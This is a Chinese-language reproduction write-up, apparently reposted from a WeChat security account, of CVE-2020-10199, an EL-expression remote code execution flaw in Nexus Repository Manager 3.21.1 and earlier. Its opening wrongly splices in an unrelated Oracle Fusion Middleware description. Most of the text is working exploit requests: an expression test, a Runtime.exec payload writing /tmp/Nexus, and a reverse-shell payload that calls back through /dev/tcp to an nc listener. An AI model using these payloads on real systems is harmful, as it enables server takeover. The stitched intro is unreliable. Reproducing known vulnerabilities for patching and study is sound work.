免责声明
0x01 简述
Oracle Fusion Middleware(Oracle融合中间件)是美国甲骨文(Oracle)公司的一套面向企业和云环境的业务创新平台。该平台提供了中间件、软件集合等功能nexus的全称是Nexus Repository Manager,是Sonatype公司的一个产品。它是一个强大的仓库管理器,极大地简化了内部仓库的维护和外部仓库的访问。主要用它来搭建公司内部的maven私服。但是它的功能不仅仅是创建maven私有仓库这么简单,还可以作为nuget、docker、npm、bower、pypi、rubygems、git lfs、yum、go、apt等的私有仓库,功能非常强大。
技术点
攻击者可通过普通用户,执行任意代码,从而控制服务器
漏洞原理
在Nexus Repository Manager OSS/Pro 3.21.1 及之前的版本中,由于某处功能安全处理不当,导致经过授权认证的攻击者,可以在远程通过构造恶意的 HTTP 请求,在服务端执行任意恶意代码、执行了不安全的EL表达式,从而获取到系统权限。
影响版本
Nexus Repository Manager OSS/Pro 3.x <= 3.21.1
0x02 漏洞复现
1. 启动环境访问页面
2. 使用账号id:admin password:admin登录账号
3. brup抓包且构造如下数据包,执行6*6*6
POST /service/rest/beta/repositories/go/group HTTP/1.1Host: 192.168.117.131:42023Content-Length: 187X-Requested-With: XMLHttpRequestX-Nexus-UI: trueUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0NX-ANTI-CSRF-TOKEN:0.9468176225792493Content-Type: application/jsonAccept: */*Origin: 192.168.117.131:42023Referer: 192.168.117.131:42023Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: NX-ANTI-CSRF-TOKEN=0.9468176225792493; NXSESSIONID=ce2578b0-1eb1-4881-8fdc-b4ac02196bffConnection: close{"name": "internal","online": true,"storage": {"blobStoreName": "default","strictContentTypeValidation": true},"group": {"memberNames": ["$\A{6*6*6}"]}}注:包构造时需按下图显示,即内容识别出高亮,若不行,则space微调就好了
4. 把执行6*6*6修改为创建一个Nexus文件
POST /service/rest/beta/repositories/go/group HTTP/1.1Host: 192.168.117.131:42023Content-Length: 187X-Requested-With: XMLHttpRequestX-Nexus-UI: trueUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0NX-ANTI-CSRF-TOKEN:0.9468176225792493Content-Type: application/jsonAccept: */*Origin: 192.168.117.131:42023Referer: 192.168.117.131:42023Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: NX-ANTI-CSRF-TOKEN=0.9468176225792493; NXSESSIONID=ce2578b0-1eb1-4881-8fdc-b4ac02196bffConnection: close{"name": "internal","online": true,"storage": {"blobStoreName": "default","strictContentTypeValidation": true},"group": {"memberNames": ["$\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch /tmp/Nexus')}"]}
1. Nc监听指定端口4216,执行反弹shell
POST /service/rest/beta/repositories/go/group HTTP/1.1Host: 192.168.117.131:42023Content-Length: 187X-Requested-With: XMLHttpRequestX-Nexus-UI: trueUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0NX-ANTI-CSRF-TOKEN:0.9468176225792493Content-Type: application/jsonAccept: */*Origin: 192.168.117.131:42023Referer: 192.168.117.131:42023Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: NX-ANTI-CSRF-TOKEN=0.9468176225792493; NXSESSIONID=ce2578b0-1eb1-4881-8fdc-b4ac02196bffConnection: close{"name": "internal","online": true,"storage": {"blobStoreName": "default","strictContentTypeValidation": true},"group": {"memberNames": ["$\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('/bin/bash -c bash$IFS$9-i>&/dev/tcp/192.168.117.131/4216<&1')}"]}}
0x03 知识星球
原文始发于微信公众号(狐狸说安全):CVE-2020-10199 Nexus Repository Manager远程代码执行漏洞复现
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论